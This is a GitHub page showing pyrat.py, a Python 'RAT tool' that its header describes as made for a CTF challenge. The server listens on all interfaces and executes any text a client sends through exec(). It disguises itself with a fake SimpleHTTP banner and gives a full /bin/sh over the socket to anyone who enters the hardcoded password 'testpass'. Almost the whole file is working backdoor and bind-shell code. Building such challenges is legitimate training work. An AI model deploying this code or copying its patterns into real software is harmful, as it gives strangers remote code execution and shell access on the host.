-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpyrat.py
202 lines (160 loc) · 5.24 KB
/
pyrat.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
# Made by [email protected]
# Pyrat.py is a "python RAT tool" designed to be used on CTF
import socket
import sys
from io import StringIO
import datetime
import os
import multiprocessing
manager = multiprocessing.Manager()
admins = manager.list()
def handle_client(client_socket, client_address):
try:
while True:
# Receive data from the client
data = client_socket.recv(1024).decode("utf-8")
if not data:
# Client disconnected
break
if is_http(data):
send_data(client_socket, fake_http())
continue
switch_case(client_socket, str(data).strip())
except:
pass
remove_socket(client_socket)
def switch_case(client_socket, data):
if data == 'admin':
get_admin(client_socket)
else:
# Check socket is admin and downgrade if is not aprooved
uid = os.getuid()
if (uid == 0) and (str(client_socket) not in admins):
change_uid()
if data == 'shell':
shell(client_socket)
remove_socket(client_socket)
else:
exec_python(client_socket, data)
# Tries to execute the random data with Python
def exec_python(client_socket, data):
try:
print(str(client_socket) + " : " + str(data))
# Redirect stdout to capture the printed output
captured_output = StringIO()
sys.stdout = captured_output
# Execute the received data as code
exec(data)
# Get the captured output
exec_output = captured_output.getvalue()
# Send the result back to the client
send_data(client_socket, exec_output)
except Exception as e:
# Send the exception message back to the client
send_data(client_socket, e)
finally:
# Reset stdout to the default
sys.stdout = sys.__stdout__
# Handles the Admin endpoint
def get_admin(client_socket):
global admins
uid = os.getuid()
if (uid != 0):
send_data(client_socket, "Start a fresh client to begin.")
return
password = 'testpass'
for i in range(0, 3):
# Ask for Password
send_data(client_socket, "Password:")
# Receive data from the client
try:
data = client_socket.recv(1024).decode("utf-8")
except Exception as e:
# Send the exception message back to the client
send_data(client_socket, e)
pass
finally:
# Reset stdout to the default
sys.stdout = sys.__stdout__
if data.strip() == password:
admins.append(str(client_socket))
send_data(client_socket, 'Welcome Admin!!! Type "shell" to begin')
break
def shell(client_socket):
try:
import pty
os.dup2(client_socket.fileno(), 0)
os.dup2(client_socket.fileno(), 1)
os.dup2(client_socket.fileno(), 2)
pty.spawn("/bin/sh")
except Exception as e:
send_data(client_socket, e)
# Sends data to the clients
def send_data(client_socket, data):
try:
client_socket.sendall((str(data) + '\n').encode("utf-8"))
except:
remove_socket(client_socket)
def start_server(host, port):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(5)
print(f"Server listening on {host}:{port}...")
while True:
client_socket, client_address = server_socket.accept()
# Start a new process to handle the client
p = multiprocessing.Process(target=handle_client, args=(client_socket, client_address))
p.start()
def remove_socket(client_socket):
client_socket.close()
try:
global admins
# Replace the original and admins lists
admins = admins._getvalue()
if str(client_socket) in admins:
admins.remove(str(client_socket))
except:
pass
# Check if the received data is an HTTP request
def is_http(data):
if ('HTTP' in data) and ('Host:' in data):
return True
return False
# Sends a fake Python HTTP Server Banner
def fake_http():
try:
# Get the current date and time
current_datetime = datetime.datetime.now()
# Format the date and time according to the desired format
formatted_datetime = current_datetime.strftime("%a %b %d %H:%M:%S %Z %Y")
banner = """
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.11.2
Date: {date}""".format(date=formatted_datetime) + """
Content-type: text/html; charset=utf-8
Content-Length: 27
Try a more basic connection!
"""
return banner[1:]
except:
return 'HTTP/1.0 200 OK'
def change_uid():
uid = os.getuid()
if uid == 0:
# Make python code execution run as user 33 (www-data)
euid = 33
groups = os.getgroups()
if 0 in groups:
groups.remove(0)
os.setgroups(groups)
os.setgid(euid)
os.setuid(euid)
# MAIN
if __name__ == "__main__":
host = "0.0.0.0" # Replace with your desired IP address
port = 8000 # Replace with your desired port number
try:
start_server(host, port)
except KeyboardInterrupt:
print('Shutting Down...')
sys.exit(1)